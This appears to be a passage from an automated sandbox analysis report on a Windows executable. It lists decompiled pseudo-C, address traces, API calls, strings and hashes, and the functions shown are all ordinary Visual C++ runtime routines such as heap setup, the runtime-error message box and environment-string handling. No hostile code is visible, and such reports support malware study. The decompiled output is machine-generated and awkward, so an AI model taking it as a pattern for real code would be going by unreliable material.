					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x460c28); // executed
					} else {
						E0045D7ED(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = E0045EC2B();
						_v8 = _v8 | 0xffffffff;
						E0045DF25();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}

0x0045dec1
0x0045dec3
0x0045dec8
0x0045ded3
0x0045ded4
0x0045dee1
0x0045dee9
0x0045df2e
0x0045df31
0x00000000
0x0045df33
0x0045df33
0x0045df36
0x0045df38
0x0045df44
0x0045df3a
0x0045df3a
0x0045df3d
0x0045df3d
0x0045df45
0x0045df48
0x0045df4e
0x0045df7e
0x0045df7e
0x00000000
0x0045df50
0x0045df52
0x0045df57
0x0045df58
0x0045df6b
0x0045df6e
0x0045df72
0x0045df77
0x0045df7a
0x0045df7c
0x00000000
0x00000000
0x0045df7c
0x0045df4e
0x0045deeb
0x0045deeb
0x0045deee
0x0045def4
0x0045df8d
0x0045df8d
0x0045df90
0x0045df92
0x0045df96
0x0045df96
0x0045df9a
0x0045df9a
0x0045df9c
0x0045df9d
0x0045df9d
0x0045dfa5
0x0045defa
0x0045defc
0x0045df02
0x0045df06
0x0045df0d
0x0045df10
0x0045df14
0x0045df19
0x0045df1e
0x00000000
0x00000000
0x0045df20
0x0045df1e
0x0045def4
0x0045dfae
0x0045dfb9

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0045DFA5

Part of subcall function 0045D7ED: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0045E42B,00000009,00000000,00000000,00000001,0045D251,00000001,00000074,?,?,00000000,00000001), ref: 0045D82A
Part of subcall function 0045D7ED: EnterCriticalSection.KERNEL32(?,?,?,0045E42B,00000009,00000000,00000000,00000001,0045D251,00000001,00000074,?,?,00000000,00000001), ref: 0045D845

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: 382a7b558a3cd30ae59b5704729ab29a43044c9446e47bfeac73aeebc46ffbad
Instruction ID: 14b8c7463d20e42bd23f19e597794005404e6c10196f14037d0aa7d1802273cd
Opcode Fuzzy Hash: 382a7b558a3cd30ae59b5704729ab29a43044c9446e47bfeac73aeebc46ffbad
Instruction Fuzzy Hash: E3218633E00204ABDB20EF65DC42B9EB764EF00765F204527FC16E73C2D778A9498A99

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0045F704, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0045F704(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x460858 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x46085c; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x460860; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x460858(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x460858 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x46085c = GetProcAddress(_t15, "GetActiveWindow");
					 *0x460860 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

0x0045f705
0x0045f707
0x0045f70f
0x0045f753
0x0045f753
0x0045f75a
0x0045f75e
0x0045f762
0x0045f764
0x0045f76b
0x0045f770
0x0045f770
0x0045f76b
0x0045f762
0x00000000
0x0045f77f
0x0045f71c
0x0045f720
0x0045f789
0x00000000
0x0045f789
0x0045f72e
0x0045f732
0x0045f737
0x00000000
0x0045f739
0x0045f747
0x0045f74e
0x00000000
0x0045f74e

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0045D795,?,Microsoft Visual C++ Runtime Library,00012010,?,0045B808,?,0045B858,?,?,?,Runtime Error!Program: ), ref: 0045F716
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0045F72E
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0045F73F
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0045F74C

Strings

GetActiveWindow, xrefs: 0045F739
user32.dll, xrefs: 0045F711
GetLastActivePopup, xrefs: 0045F741
MessageBoxA, xrefs: 0045F728

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: a713ebb277d1b4442716c436f731940a8e8f6d4a6ffd7f58175943fb614465bc
Instruction ID: 82aae07ad804a559275478a6d9b72a6bb7b276ecf71e3d81b53aa0690f52e056
Opcode Fuzzy Hash: a713ebb277d1b4442716c436f731940a8e8f6d4a6ffd7f58175943fb614465bc
Instruction Fuzzy Hash: 6E011E71610245AF8751EFB59C80A672BE9EB4C792714043BE900D3222E7B8D8499FAA

Uniqueness

Uniqueness Score: -1.00%

Function 0045FADD, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0045FADD(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, char _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x45b940);
				_push(E0045D560);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x460888; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x46087c; // 0x0
								_a20 = _t44;
							}
							_t13 =  &_a28; // 0x4609e4
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~( *_t13) & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E0045E860(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E0045FC50(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x46086c; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x45b920, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x45b91c, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x460888 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

0x0045fae0
0x0045fae2
0x0045fae7
0x0045faf2
0x0045faf3
0x0045fafa
0x0045fb00
0x0045fb03
0x0045fb0c
0x0045fb4c
0x0045fb4f
0x0045fb78
0x00000000
0x0045fb7e
0x0045fb81
0x0045fb83
0x0045fb88
0x0045fb88
0x0045fb93
0x0045fb98
0x0045fba2
0x0045fba8
0x0045fbad
0x00000000
0x0045fbaf
0x0045fbaf
0x0045fbbc
0x0045fbc1
0x0045fbc4
0x0045fbc6
0x0045fbcc
0x0045fbe1
0x0045fbe7
0x00000000
0x0045fbe9
0x0045fbf8
0x0045fc00
0x00000000
0x0045fc02
0x0045fc0a
0x0045fc0a
0x0045fc00
0x0045fbe7
0x0045fbad
0x0045fb51
0x0045fb51
0x0045fb56
0x0045fb58
0x0045fb58
0x0045fb6a
0x0045fb6a
0x0045fb0e
0x0045fb11
0x0045fb14
0x0045fb24
0x0045fb3e
0x0045fc12
0x0045fc12
0x0045fb44
0x0045fb46
0x00000000
0x0045fb46
0x0045fb26
0x0045fb26
0x0045fb47
0x0045fb47
0x00000000
0x0045fb47
0x0045fb24
0x0045fc1a
0x0045fc25

APIs

GetStringTypeW.KERNEL32(00000001,0045B920,00000001,?,751470F0,004609E4,?,?,0045FD02,?,?,?,00000000,00000001), ref: 0045FB1C
GetStringTypeA.KERNEL32(00000000,00000001,0045B91C,00000001,?,?,0045FD02,?,?,?,00000000,00000001), ref: 0045FB36
GetStringTypeA.KERNEL32(?,?,?,?,0045FD02,751470F0,004609E4,?,?,0045FD02,?,?,?,00000000,00000001), ref: 0045FB6A
MultiByteToWideChar.KERNEL32(?,F,?,?,00000000,00000000,751470F0,004609E4,?,?,0045FD02,?,?,?,00000000,00000001), ref: 0045FBA2
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,0045FD02,?), ref: 0045FBF8
GetStringTypeW.KERNEL32(?,?,00000000,0045FD02,?,?,?,?,?,?,0045FD02,?), ref: 0045FC0A

Strings

F, xrefs: 0045FB93, 0045FB9E

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: StringType$ByteCharMultiWide
String ID: F
API String ID: 3852931651-2857159536
Opcode ID: 44a4bf3215ee9ea7eadd92ea669d908f90f1ac6eb51130e829b62e20d80e732b
Instruction ID: 5cda5eef1fe6e138e25ead496d294b320eb4d36e3d35a931db2eac7885421bb2
Opcode Fuzzy Hash: 44a4bf3215ee9ea7eadd92ea669d908f90f1ac6eb51130e829b62e20d80e732b
Instruction Fuzzy Hash: 99419B71900209EFCF219F94DD85EEF7B69FB08751F104436FE01D2262D33899989AAA

Uniqueness

Uniqueness Score: -1.00%

Function 0045D671, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0045D671(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x458c28;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x458cb8) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x458c28; // 0x8000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x460698; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x458b5c == 1) {
						_t16 = _t54 + 0x458c2c; // 0x45b808
						_t56 = _t16;
						_t19 = E0045DFC0( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E0045DD90( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E0045DFC0( &_v424) + 1 > 0x3c) {
								_t49 = E0045DFC0( &_v424) +  &_v424 - 0x3b;
								E0045F790(E0045DFC0( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E0045DD90( &_v164, "Runtime Error!\n\nProgram: ");
							E0045DDA0( &_v164, _t49);
							E0045DDA0( &_v164, "\n\n");
							_t12 = _t54 + 0x458c2c; // 0x45b808
							E0045DDA0( &_v164,  *_t12);
							_t17 = E0045F704( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x0045d671
0x0045d67a
0x0045d67d
0x0045d67f
0x0045d684
0x0045d688
0x0045d68b
0x0045d691
0x00000000
0x00000000
0x00000000
0x0045d691
0x0045d696
0x0045d699
0x0045d69f
0x0045d6a5
0x0045d6ad
0x0045d79e
0x0045d79e
0x0045d7a9
0x0045d7bb
0x0045d6c4
0x0045d6ca
0x0045d6e6
0x0045d6f4
0x0045d6fa
0x0045d701
0x0045d703
0x0045d713
0x0045d72e
0x0045d736
0x0045d73b
0x0045d73b
0x0045d74a
0x0045d757
0x0045d768
0x0045d76d
0x0045d77a
0x0045d790
0x0045d798
0x0045d6ca
0x0045d6ad
0x0045d7c3

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0045D6DE
GetStdHandle.KERNEL32(000000F4,0045B808,00000000,00000000,00000000,?), ref: 0045D7B4
WriteFile.KERNEL32(00000000), ref: 0045D7BB

Strings

..., xrefs: 0045D730
Runtime Error!Program: , xrefs: 0045D744
<program name unknown>, xrefs: 0045D6EE
Microsoft Visual C++ Runtime Library, xrefs: 0045D78A

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: 3c9ff4b61fe4b50329fef4beac69df0f7b7a50cd78879ecc6a163889dd784fb2
Instruction ID: 669a6ad2395bf69d16c5bf6ec3441bb35e2598d6d7d80c12e2c6851a012a24cd
Opcode Fuzzy Hash: 3c9ff4b61fe4b50329fef4beac69df0f7b7a50cd78879ecc6a163889dd784fb2
Instruction Fuzzy Hash: EB31C472E002186EDB30E760CC45FAE336CEF49306F50046BFD45E6093EA78A98D8A59

Uniqueness

Uniqueness Score: -1.00%

Function 0045CED7, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045CED7() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x4607e4; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E0045DE80(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E0045E040(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E0045DE80(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E0045DC99(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x4607e4 = 2;
					goto L18;
				}
				 *0x4607e4 = 1;
				goto L6;
			}

0x0045ced9
0x0045cee8
0x0045ceea
0x0045ceec
0x0045cef0
0x0045cf28
0x0045cfb2
0x0045d000
0x00000000
0x0045d000
0x0045cfb4
0x0045cfb6
0x0045cfc4
0x0045cfc6
0x0045cfc8
0x0045cfd4
0x0045cfd7
0x0045cfdf
0x0045cfe4
0x0045cfed
0x0045cfe6
0x0045cfe6
0x0045cfe6
0x0045cff6
0x00000000
0x00000000
0x00000000
0x00000000
0x0045cfca
0x0045cfca
0x0045cfca
0x0045cfca
0x0045cfcb
0x0045cfcf
0x0045cfd0
0x00000000
0x0045cfca
0x0045cfbe
0x0045cfc2
0x00000000
0x00000000
0x00000000
0x0045cfc2
0x0045cf2e
0x0045cf30
0x0045cf3e
0x0045cf41
0x0045cf43
0x0045cf53
0x0045cf5f
0x0045cf66
0x0045cf6c
0x0045cf70
0x0045cf73
0x0045cf7b
0x0045cf7f
0x0045cf90
0x0045cf96
0x0045cf9c
0x0045cf9c
0x0045cfa0
0x0045cfa0
0x0045cf7f
0x0045cfa5
0x00000000
0x00000000
0x00000000
0x00000000
0x0045cf45
0x0045cf45
0x0045cf45
0x0045cf46
0x0045cf47
0x0045cf4d
0x0045cf4e
0x00000000
0x0045cf45
0x0045cf34
0x0045cf38
0x00000000
0x00000000
0x00000000
0x0045cf38
0x0045cef4
0x0045cef8
0x0045cf0c
0x0045cf10
0x00000000
0x00000000
0x0045cf16
0x00000000
0x0045cf16
0x0045cefa
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0045C826), ref: 0045CEF2
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0045C826), ref: 0045CF06
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0045C826), ref: 0045CF32
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0045C826), ref: 0045CF6A
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0045C826), ref: 0045CF8C
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0045C826), ref: 0045CFA5
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0045C826), ref: 0045CFB8
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0045CFF6

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: 1711d461e2d38e0a3a98c7da594e0fce70e095d75a16f7da1c82ac3953a0853f
Instruction ID: 059c1d434ce4ec00dc91820170b695378bb53829a5c94a23934e48e44329aa02
Opcode Fuzzy Hash: 1711d461e2d38e0a3a98c7da594e0fce70e095d75a16f7da1c82ac3953a0853f
Instruction Fuzzy Hash: E23105739093516FD7307B785CC483BBA9EEA4474A711043BFD42D3282E6299C8982AD

Uniqueness

Uniqueness Score: -1.00%

Function 0045D2C0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0045D2C0(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E0045E860(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E0045D293( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E0045E820("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E0045E7A0( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E0045E6E0(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E0045E4B2(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}

0x0045d2c8
0x0045d2d5
0x0045d2e7
0x0045d2fd
0x00000000
0x0045d2fd
0x0045d31c
0x0045d3f2
0x0045d3f6
0x0045d400
0x00000000
0x0045d402
0x0045d324
0x0045d330
0x0045d332
0x0045d332
0x0045d336
0x0045d33e
0x0045d33e
0x0045d340
0x0045d341
0x0045d332
0x0045d35d
0x0045d374
0x0045d380
0x0045d386
0x0045d388
0x0045d388
0x0045d38c
0x0045d394
0x0045d394
0x0045d396
0x0045d397
0x0045d388
0x0045d3a9
0x0045d35f
0x0045d35f
0x0045d35f
0x0045d3b2
0x00000000
0x00000000
0x0045d3b7
0x0045d3c0
0x00000000
0x00000000
0x0045d3c2
0x0045d3c3
0x0045d3c7
0x0045d3c9
0x0045d3cc
0x0045d3d2
0x0045d3ce
0x0045d3ce
0x0045d3ce
0x0045d3d3
0x0045d3c9
0x0045d3db
0x0045d3e6
0x00000000
0x00000000
0x0045d407

APIs

GetVersionExA.KERNEL32 ref: 0045D2DF
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 0045D314
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0045D374

Strings

__MSVCRT_HEAP_SELECT, xrefs: 0045D30F
__GLOBAL_HEAP_SELECTED, xrefs: 0045D34E

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: b6a4731734317237be46f0b888b782626f6b9bc84657926034d0be77df41e467
Instruction ID: 50081724d3d3ffd217e92d6b4c63f8329e34b3322cdc092f81d912164c93a5c5
Opcode Fuzzy Hash: b6a4731734317237be46f0b888b782626f6b9bc84657926034d0be77df41e467
Instruction Fuzzy Hash: 78312771D01288A9EB359A705C45ADE3768DF06346F1404EBED85D6243E63C9ECECB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0045D009, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0045D009() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E0045DE80(0x480);
				if(_t89 == 0) {
					E0045C898(0x1b);
				}
				 *0x460c40 = _t89;
				 *0x460d40 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x460c40; // 0x810630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x460c40; // 0x810630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x460d40);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x460d40 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
